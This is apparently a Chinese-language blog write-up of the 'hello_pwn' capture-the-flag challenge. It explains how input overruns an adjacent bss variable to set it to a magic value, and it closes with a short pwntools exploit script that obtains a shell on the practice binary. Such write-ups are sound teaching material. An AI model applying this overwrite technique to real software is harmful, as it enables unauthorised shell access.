首发于鄙人博客:传送门
0x00 前言
file checksec已省略。64位elf程序
0x10 步骤
0x11 main函数
在main函数中我们可以看到,它让我们输入unk_601068的值,而如果我们想getshell,那么我们便需要将dword_60106c的值赋为1853186401。
0x11 bss段观察
可以看到这两个数据的距离并不远,所以当我们输入第一个值二点时候,我们便可以先输入4个无关数据,然后再将1853186401的值打包发给dword。即payload为payload = 'a'*4+p64(1853186401)
0x20 exp
from pwn import *
sh = process("./hello_pwn")
payload = 'a'*4+p64(1853186401)
sh.recvuntil("bof")
sh.sendline(payload)
sh.interactive()